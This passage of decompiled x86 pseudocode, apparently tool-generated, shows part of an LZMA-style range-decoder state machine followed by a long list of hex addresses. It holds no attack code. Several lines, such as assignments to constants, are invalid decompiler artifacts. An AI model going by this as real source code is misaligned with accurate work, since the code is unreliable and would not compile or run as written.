                                                              											 *_t203 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t203;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											L60:
                                                              											__eflags = __ebx - 0x100;
                                                              											if(__ebx >= 0x100) {
                                                              												L55:
                                                              												__al =  *(__ebp - 0x44);
                                                              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                              												goto L56;
                                                              											}
                                                              											L61:
                                                              											__eax =  *(__ebp - 0x58);
                                                              											__edx = __ebx + __ebx;
                                                              											__ecx =  *(__ebp - 0x10);
                                                              											__esi = __edx + __eax;
                                                              											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              											__ax =  *__esi;
                                                              											 *(__ebp - 0x54) = __esi;
                                                              											__edi = __ax & 0x0000ffff;
                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              												__cx = __ax;
                                                              												_t217 = __edx + 1; // 0x1
                                                              												__ebx = _t217;
                                                              												__cx = __ax >> 5;
                                                              												__eflags = __eax;
                                                              												 *__esi = __ax;
                                                              											} else {
                                                              												 *(__ebp - 0x10) = __ecx;
                                                              												0x800 = 0x800 - __edi;
                                                              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              												__ebx = __ebx + __ebx;
                                                              												 *__esi = __cx;
                                                              											}
                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              											 *(__ebp - 0x44) = __ebx;
                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                              												goto L60;
                                                              											} else {
                                                              												L65:
                                                              												goto L58;
                                                              											}
                                                              										case 0x10:
                                                              											L109:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												L165:
                                                              												 *(__ebp - 0x88) = 0x10;
                                                              												goto L170;
                                                              											}
                                                              											L110:
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t365 = __ebp - 0x70;
                                                              											 *_t365 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t365;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											goto L111;
                                                              										case 0x11:
                                                              											L69:
                                                              											__esi =  *(__ebp - 0x58);
                                                              											 *(__ebp - 0x84) = 0x12;
                                                              											goto L132;
                                                              										case 0x12:
                                                              											L128:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												L131:
                                                              												__eax =  *(__ebp - 0x58);
                                                              												 *(__ebp - 0x84) = 0x13;
                                                              												__esi =  *(__ebp - 0x58) + 2;
                                                              												L132:
                                                              												 *(_t644 - 0x54) = _t642;
                                                              												goto L133;
                                                              											}
                                                              											L129:
                                                              											__eax =  *(__ebp - 0x4c);
                                                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                              											__ecx =  *(__ebp - 0x58);
                                                              											__eax =  *(__ebp - 0x4c) << 4;
                                                              											__eflags = __eax;
                                                              											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                              											goto L130;
                                                              										case 0x13:
                                                              											L141:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												L143:
                                                              												_t469 = __ebp - 0x58;
                                                              												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                              												__eflags =  *_t469;
                                                              												 *(__ebp - 0x30) = 0x10;
                                                              												 *(__ebp - 0x40) = 8;
                                                              												L144:
                                                              												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                              												L145:
                                                              												 *(_t644 - 0x50) = 1;
                                                              												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                              												goto L149;
                                                              											}
                                                              											L142:
                                                              											__eax =  *(__ebp - 0x4c);
                                                              											__ecx =  *(__ebp - 0x58);
                                                              											__eax =  *(__ebp - 0x4c) << 4;
                                                              											 *(__ebp - 0x30) = 8;
                                                              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                              											L130:
                                                              											 *(__ebp - 0x58) = __eax;
                                                              											 *(__ebp - 0x40) = 3;
                                                              											goto L144;
                                                              										case 0x14:
                                                              											L156:
                                                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                              											__eax =  *(__ebp - 0x80);
                                                              											while(1) {
                                                              												L140:
                                                              												 *(_t644 - 0x88) = _t537;
                                                              												goto L1;
                                                              											}
                                                              										case 0x15:
                                                              											L91:
                                                              											__eax = 0;
                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              											__al = __al & 0x000000fd;
                                                              											__eax = (__eflags >= 0) - 1 + 0xb;
                                                              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                              											goto L120;
                                                              										case 0x16:
                                                              											goto L0;
                                                              										case 0x17:
                                                              											while(1) {
                                                              												L145:
                                                              												 *(_t644 - 0x50) = 1;
                                                              												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                              												goto L149;
                                                              											}
                                                              										case 0x18:
                                                              											goto L146;
                                                              										case 0x19:
                                                              											L94:
                                                              											__eflags = __ebx - 4;
                                                              											if(__ebx < 4) {
                                                              												L98:
                                                              												 *(__ebp - 0x2c) = __ebx;
                                                              												L119:
                                                              												_t393 = __ebp - 0x2c;
                                                              												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                              												__eflags =  *_t393;
                                                              												L120:
                                                              												__eax =  *(__ebp - 0x2c);
                                                              												__eflags = __eax;
                                                              												if(__eax == 0) {
                                                              													L166:
                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                              													goto L170;
                                                              												}
                                                              												L121:
                                                              												__eflags = __eax -  *(__ebp - 0x60);
                                                              												if(__eax >  *(__ebp - 0x60)) {
                                                              													goto L171;
                                                              												}
                                                              												L122:
                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                              												__eax =  *(__ebp - 0x30);
                                                              												_t400 = __ebp - 0x60;
                                                              												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                              												__eflags =  *_t400;
                                                              												goto L123;
                                                              											}
                                                              											L95:
                                                              											__ecx = __ebx;
                                                              											__eax = __ebx;
                                                              											__ecx = __ebx >> 1;
                                                              											__eax = __ebx & 0x00000001;
                                                              											__ecx = (__ebx >> 1) - 1;
                                                              											__al = __al | 0x00000002;
                                                              											__eax = (__ebx & 0x00000001) << __cl;
                                                              											__eflags = __ebx - 0xe;
                                                              											 *(__ebp - 0x2c) = __eax;
                                                              											if(__ebx >= 0xe) {
                                                              												L97:
                                                              												__ebx = 0;
                                                              												 *(__ebp - 0x48) = __ecx;
                                                              												L102:
                                                              												__eflags =  *(__ebp - 0x48);
                                                              												if( *(__ebp - 0x48) <= 0) {
                                                              													L107:
                                                              													__eax = __eax + __ebx;
                                                              													 *(__ebp - 0x40) = 4;
                                                              													 *(__ebp - 0x2c) = __eax;
                                                              													__eax =  *(__ebp - 4);
                                                              													__eax =  *(__ebp - 4) + 0x644;
                                                              													__eflags = __eax;
                                                              													L108:
                                                              													__ebx = 0;
                                                              													 *(__ebp - 0x58) = __eax;
                                                              													 *(__ebp - 0x50) = 1;
                                                              													 *(__ebp - 0x44) = 0;
                                                              													 *(__ebp - 0x48) = 0;
                                                              													L112:
                                                              													__eax =  *(__ebp - 0x40);
                                                              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                              														L118:
                                                              														_t391 = __ebp - 0x2c;
                                                              														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                              														__eflags =  *_t391;
                                                              														goto L119;
                                                              													}
                                                              													L113:
                                                              													__eax =  *(__ebp - 0x50);
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                              													__eax =  *(__ebp - 0x58);
                                                              													__esi = __edi + __eax;
                                                              													 *(__ebp - 0x54) = __esi;
                                                              													__ax =  *__esi;
                                                              													__ecx = __ax & 0x0000ffff;
                                                              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                              													__eflags =  *(__ebp - 0xc) - __edx;
                                                              													if( *(__ebp - 0xc) >= __edx) {
                                                              														__ecx = 0;
                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                              														__ecx = 1;
                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                              														__ebx = 1;
                                                              														__ecx =  *(__ebp - 0x48);
                                                              														__ebx = 1 << __cl;
                                                              														__ecx = 1 << __cl;
                                                              														__ebx =  *(__ebp - 0x44);
                                                              														__ebx =  *(__ebp - 0x44) | __ecx;
                                                              														__cx = __ax;
                                                              														__cx = __ax >> 5;
                                                              														__eax = __eax - __ecx;
                                                              														__edi = __edi + 1;
                                                              														__eflags = __edi;
                                                              														 *(__ebp - 0x44) = __ebx;
                                                              														 *__esi = __ax;
                                                              														 *(__ebp - 0x50) = __edi;
                                                              													} else {
                                                              														 *(__ebp - 0x10) = __edx;
                                                              														0x800 = 0x800 - __ecx;
                                                              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                              														 *__esi = __dx;
                                                              													}
                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                              														L111:
                                                              														_t368 = __ebp - 0x48;
                                                              														 *_t368 =  *(__ebp - 0x48) + 1;
                                                              														__eflags =  *_t368;
                                                              														goto L112;
                                                              													} else {
                                                              														L117:
                                                              														goto L109;
                                                              													}
                                                              												}
                                                              												L103:
                                                              												__ecx =  *(__ebp - 0xc);
                                                              												__ebx = __ebx + __ebx;
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              												 *(__ebp - 0x44) = __ebx;
                                                              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                              													__ecx =  *(__ebp - 0x10);
                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              													__ebx = __ebx | 0x00000001;
                                                              													__eflags = __ebx;
                                                              													 *(__ebp - 0x44) = __ebx;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                              													L101:
                                                              													_t338 = __ebp - 0x48;
                                                              													 *_t338 =  *(__ebp - 0x48) - 1;
                                                              													__eflags =  *_t338;
                                                              													goto L102;
                                                              												} else {
                                                              													L106:
                                                              													goto L99;
                                                              												}
                                                              											}
                                                              											L96:
                                                              											__edx =  *(__ebp - 4);
                                                              											__eax = __eax - __ebx;
                                                              											 *(__ebp - 0x40) = __ecx;
                                                              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                              											goto L108;
                                                              										case 0x1a:
                                                              											L56:
                                                              											__eflags =  *(__ebp - 0x64);
                                                              											if( *(__ebp - 0x64) == 0) {
                                                              												L162:
                                                              												 *(__ebp - 0x88) = 0x1a;
                                                              												goto L170;
                                                              											}
                                                              											L57:
                                                              											__ecx =  *(__ebp - 0x68);
                                                              											__al =  *(__ebp - 0x5c);
                                                              											__edx =  *(__ebp - 8);
                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              											 *( *(__ebp - 0x68)) = __al;
                                                              											__ecx =  *(__ebp - 0x14);
                                                              											 *(__ecx +  *(__ebp - 8)) = __al;
                                                              											__eax = __ecx + 1;
                                                              											__edx = 0;
                                                              											_t192 = __eax %  *(__ebp - 0x74);
                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                              											__edx = _t192;
                                                              											goto L80;
                                                              										case 0x1b:
                                                              											L76:
                                                              											__eflags =  *(__ebp - 0x64);
                                                              											if( *(__ebp - 0x64) == 0) {
                                                              												L163:
                                                              												 *(__ebp - 0x88) = 0x1b;
                                                              												goto L170;
                                                              											}
                                                              											L77:
                                                              											__eax =  *(__ebp - 0x14);
                                                              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              											__eflags = __eax -  *(__ebp - 0x74);
                                                              											if(__eax >=  *(__ebp - 0x74)) {
                                                              												__eax = __eax +  *(__ebp - 0x74);
                                                              												__eflags = __eax;
                                                              											}
                                                              											__edx =  *(__ebp - 8);
                                                              											__cl =  *(__eax + __edx);
                                                              											__eax =  *(__ebp - 0x14);
                                                              											 *(__ebp - 0x5c) = __cl;
                                                              											 *(__eax + __edx) = __cl;
                                                              											__eax = __eax + 1;
                                                              											__edx = 0;
                                                              											_t275 = __eax %  *(__ebp - 0x74);
                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                              											__edx = _t275;
                                                              											__eax =  *(__ebp - 0x68);
                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              											_t284 = __ebp - 0x64;
                                                              											 *_t284 =  *(__ebp - 0x64) - 1;
                                                              											__eflags =  *_t284;
                                                              											 *( *(__ebp - 0x68)) = __cl;
                                                              											L80:
                                                              											 *(__ebp - 0x14) = __edx;
                                                              											goto L81;
                                                              										case 0x1c:
                                                              											while(1) {
                                                              												L123:
                                                              												__eflags =  *(__ebp - 0x64);
                                                              												if( *(__ebp - 0x64) == 0) {
                                                              													break;
                                                              												}
                                                              												L124:
                                                              												__eax =  *(__ebp - 0x14);
                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                              													__eflags = __eax;
                                                              												}
                                                              												__edx =  *(__ebp - 8);
                                                              												__cl =  *(__eax + __edx);
                                                              												__eax =  *(__ebp - 0x14);
                                                              												 *(__ebp - 0x5c) = __cl;
                                                              												 *(__eax + __edx) = __cl;
                                                              												__eax = __eax + 1;
                                                              												__edx = 0;
                                                              												_t414 = __eax %  *(__ebp - 0x74);
                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                              												__edx = _t414;
                                                              												__eax =  *(__ebp - 0x68);
                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                              												__eflags =  *(__ebp - 0x30);
                                                              												 *( *(__ebp - 0x68)) = __cl;
                                                              												 *(__ebp - 0x14) = _t414;
                                                              												if( *(__ebp - 0x30) > 0) {
                                                              													continue;
                                                              												} else {
                                                              													L127:
                                                              													L81:
                                                              													 *(__ebp - 0x88) = 2;
                                                              													goto L1;
                                                              												}
                                                              											}
                                                              											L167:
                                                              											 *(__ebp - 0x88) = 0x1c;
                                                              											goto L170;
                                                              									}
                                                              								}
                                                              								L171:
                                                              								_t539 = _t538 | 0xffffffff;
                                                              								goto L172;
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              			}















                                                              0x00407194
                                                              0x00407194
                                                              0x00407194
                                                              0x00407194
                                                              0x0040719a
                                                              0x0040719e
                                                              0x004071a2
                                                              0x004071ac
                                                              0x004071ba
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x004074c7
                                                              0x004074c7
                                                              0x004074cb
                                                              0x00000000
                                                              0x00000000
                                                              0x004074cd
                                                              0x004074d6
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x00407524
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c7
                                                              0x004074cb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407526
                                                              0x00407526
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x004075db
                                                              0x004075e5
                                                              0x004075ed
                                                              0x004075f4
                                                              0x004075f6
                                                              0x004075fd
                                                              0x00407601
                                                              0x00407601
                                                              0x004074a9
                                                              0x004074af
                                                              0x004074b6
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x00000000
                                                              0x004074c1
                                                              0x0040752b
                                                              0x00407538
                                                              0x0040753b
                                                              0x00407447
                                                              0x00407447
                                                              0x00407447
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406bec
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x00406bf2
                                                              0x00000000
                                                              0x00406bf9
                                                              0x00406bfd
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c03
                                                              0x00406c06
                                                              0x00406c09
                                                              0x00406c0c
                                                              0x00406c10
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c16
                                                              0x00406c16
                                                              0x00406c19
                                                              0x00406c1b
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406c21
                                                              0x00406c22
                                                              0x00406c24
                                                              0x00406c27
                                                              0x00406c2c
                                                              0x00406c31
                                                              0x00406c3a
                                                              0x00406c4d
                                                              0x00406c50
                                                              0x00406c5c
                                                              0x00406c84
                                                              0x00406c86
                                                              0x00406c94
                                                              0x00406c94
                                                              0x00406c98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c88
                                                              0x00406c8b
                                                              0x00406c8c
                                                              0x00406c8c
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c5e
                                                              0x00406c62
                                                              0x00406c67
                                                              0x00406c67
                                                              0x00406c70
                                                              0x00406c78
                                                              0x00406c7b
                                                              0x00000000
                                                              0x00406c81
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c9e
                                                              0x00406c9e
                                                              0x00406ca2
                                                              0x0040754e
                                                              0x0040754e
                                                              0x00000000
                                                              0x0040754e
                                                              0x00406ca8
                                                              0x00406cab
                                                              0x00406cbb
                                                              0x00406cbe
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc4
                                                              0x00406cc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406cca
                                                              0x00406cca
                                                              0x00406cd0
                                                              0x00406cfa
                                                              0x00406d00
                                                              0x00406d07
                                                              0x00000000
                                                              0x00406d07
                                                              0x00406cd2
                                                              0x00406cd6
                                                              0x00406cd9
                                                              0x00406cde
                                                              0x00406cde
                                                              0x00406ce9
                                                              0x00406cf1
                                                              0x00406cf4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d39
                                                              0x00406d3f
                                                              0x00406d42
                                                              0x00406d4f
                                                              0x00406d57
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d0e
                                                              0x00406d0e
                                                              0x00406d12
                                                              0x0040755d
                                                              0x0040755d
                                                              0x00000000
                                                              0x0040755d
                                                              0x00406d18
                                                              0x00406d1e
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d32
                                                              0x00406d37
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040741c
                                                              0x00407420
                                                              0x004075cf
                                                              0x004075cf
                                                              0x00000000
                                                              0x004075cf
                                                              0x00407426
                                                              0x0040742c
                                                              0x00407433
                                                              0x0040743b
                                                              0x0040743e
                                                              0x00407441
                                                              0x00407441
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5f
                                                              0x00406d5f
                                                              0x00406d61
                                                              0x00406d64
                                                              0x00406dd5
                                                              0x00406dd5
                                                              0x00406dd8
                                                              0x00406ddb
                                                              0x00406de2
                                                              0x00406dec
                                                              0x00000000
                                                              0x00406dec
                                                              0x00406d66
                                                              0x00406d66
                                                              0x00406d6a
                                                              0x00406d6d
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d75
                                                              0x00406d77
                                                              0x00406d7a
                                                              0x00406d7c
                                                              0x00406d81
                                                              0x00406d84
                                                              0x00406d87
                                                              0x00406d8b
                                                              0x00406d92
                                                              0x00406d95
                                                              0x00406d9c
                                                              0x00406da0
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406dac
                                                              0x00406daf
                                                              0x00406dcd
                                                              0x00406dcd
                                                              0x00406dcf
                                                              0x00000000
                                                              0x00406db1
                                                              0x00406db1
                                                              0x00406db1
                                                              0x00406db4
                                                              0x00406db7
                                                              0x00406dba
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbf
                                                              0x00406dc2
                                                              0x00406dc4
                                                              0x00406dc5
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406ffe
                                                              0x00406ffe
                                                              0x00407002
                                                              0x00407020
                                                              0x00407020
                                                              0x00407023
                                                              0x0040702a
                                                              0x0040702d
                                                              0x00407030
                                                              0x00407033
                                                              0x00407036
                                                              0x00407039
                                                              0x0040703b
                                                              0x00407042
                                                              0x00407043
                                                              0x00407045
                                                              0x00407048
                                                              0x0040704b
                                                              0x0040704e
                                                              0x0040704e
                                                              0x00407053
                                                              0x00000000
                                                              0x00407053
                                                              0x00407004
                                                              0x00407004
                                                              0x00407007
                                                              0x0040700a
                                                              0x00407014
                                                              0x00000000
                                                              0x00000000
                                                              0x00407068
                                                              0x00407068
                                                              0x0040706c
                                                              0x0040708f
                                                              0x00407092
                                                              0x00407095
                                                              0x0040709f
                                                              0x0040706e
                                                              0x0040706e
                                                              0x00407071
                                                              0x00407074
                                                              0x00407077
                                                              0x00407084
                                                              0x00407087
                                                              0x00407087
                                                              0x00000000
                                                              0x00000000
                                                              0x004070ab
                                                              0x004070ab
                                                              0x004070af
                                                              0x00000000
                                                              0x00000000
                                                              0x004070b5
                                                              0x004070b5
                                                              0x004070b9
                                                              0x00000000
                                                              0x00000000
                                                              0x004070bf
                                                              0x004070bf
                                                              0x004070c1
                                                              0x004070c5
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070cc
                                                              0x00000000
                                                              0x00000000
                                                              0x0040711c
                                                              0x0040711c
                                                              0x00407120
                                                              0x00407127
                                                              0x00407127
                                                              0x0040712a
                                                              0x0040712d
                                                              0x00407137
                                                              0x00000000
                                                              0x00407137
                                                              0x00407122
                                                              0x00407122
                                                              0x00000000
                                                              0x00000000
                                                              0x00407143
                                                              0x00407143
                                                              0x00407147
                                                              0x0040714e
                                                              0x00407151
                                                              0x00407154
                                                              0x00407149
                                                              0x00407149
                                                              0x00407149
                                                              0x00407157
                                                              0x0040715a
                                                              0x0040715d
                                                              0x0040715d
                                                              0x00407160
                                                              0x00407163
                                                              0x00407166
                                                              0x00407166
                                                              0x00407169
                                                              0x00407170
                                                              0x00407175
                                                              0x00000000
                                                              0x00000000
                                                              0x00407203
                                                              0x00407203
                                                              0x00407207
                                                              0x004075a5
                                                              0x004075a5
                                                              0x00000000
                                                              0x004075a5
                                                              0x0040720d
                                                              0x0040720d
                                                              0x00407210
                                                              0x00407213
                                                              0x00407217
                                                              0x0040721a
                                                              0x00407220
                                                              0x00407222
                                                              0x00407222
                                                              0x00407222
                                                              0x00407225
                                                              0x00407228
                                                              0x00000000
                                                              0x00000000
                                                              0x00406df8
                                                              0x00406df8
                                                              0x00406dfc
                                                              0x00407569
                                                              0x00407569
                                                              0x00000000
                                                              0x00407569
                                                              0x00406e02
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0c
                                                              0x00406e0f
                                                              0x00406e15
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e1a
                                                              0x00406e1d
                                                              0x00406e1d
                                                              0x00406e20
                                                              0x00406e23
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e29
                                                              0x00406e29
                                                              0x00406e2f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e35
                                                              0x00406e35
                                                              0x00406e39
                                                              0x00406e3c
                                                              0x00406e3f
                                                              0x00406e42
                                                              0x00406e45
                                                              0x00406e46
                                                              0x00406e49
                                                              0x00406e4b
                                                              0x00406e51
                                                              0x00406e54
                                                              0x00406e57
                                                              0x00406e5a
                                                              0x00406e5d
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e7f
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8f
                                                              0x00406e93
                                                              0x00406e95
                                                              0x00406e99
                                                              0x00406e65
                                                              0x00406e65
                                                              0x00406e69
                                                              0x00406e71
                                                              0x00406e76
                                                              0x00406e78
                                                              0x00406e7a
                                                              0x00406e7a
                                                              0x00406e9c
                                                              0x00406ea3
                                                              0x00406ea6
                                                              0x00000000
                                                              0x00406eac
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406eb5
                                                              0x00407575
                                                              0x00407575
                                                              0x00000000
                                                              0x00407575
                                                              0x00406ebb
                                                              0x00406ebb
                                                              0x00406ebe
                                                              0x00406ec1
                                                              0x00406ec5
                                                              0x00406ec8
                                                              0x00406ece
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed3
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406edc
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ede
                                                              0x00406ede
                                                              0x00406ee1
                                                              0x00406ee4
                                                              0x00406ee7
                                                              0x00406eea
                                                              0x00406eed
                                                              0x00406ef0
                                                              0x00406ef3
                                                              0x00406ef6
                                                              0x00406ef9
                                                              0x00406efc
                                                              0x00406f14
                                                              0x00406f17
                                                              0x00406f1a
                                                              0x00406f1d
                                                              0x00406f1d
                                                              0x00406f20
                                                              0x00406f24
                                                              0x00406f26
                                                              0x00406efe
                                                              0x00406efe
                                                              0x00406f06
                                                              0x00406f0b
                                                              0x00406f0d
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f29
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00000000
                                                              0x00406f35
                                                              0x00406f35
                                                              0x00000000
                                                              0x00406f35
                                                              0x00406f33
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f75
                                                              0x00406f75
                                                              0x00406f79
                                                              0x00407581
                                                              0x00407581
                                                              0x00000000
                                                              0x00407581
                                                              0x00406f7f
                                                              0x00406f7f
                                                              0x00406f82
                                                              0x00406f85
                                                              0x00406f89
                                                              0x00406f8c
                                                              0x00406f92
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f97
                                                              0x00406f9a
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406f3e
                                                              0x00406f3e
                                                              0x00406f41
                                                              0x00000000
                                                              0x00406f41
                                                              0x00406fa2
                                                              0x00406fa2
                                                              0x00406fa5
                                                              0x00406fa8
                                                              0x00406fab
                                                              0x00406fae
                                                              0x00406fb1
                                                              0x00406fb4
                                                              0x00406fb7
                                                              0x00406fba
                                                              0x00406fbd
                                                              0x00406fc0
                                                              0x00406fd8
                                                              0x00406fdb
                                                              0x00406fde
                                                              0x00406fe1
                                                              0x00406fe1
                                                              0x00406fe4
                                                              0x00406fe8
                                                              0x00406fea
                                                              0x00406fc2
                                                              0x00406fc2
                                                              0x00406fca
                                                              0x00406fcf
                                                              0x00406fd1
                                                              0x00406fd3
                                                              0x00406fd3
                                                              0x00406fed
                                                              0x00406ff4
                                                              0x00406ff7
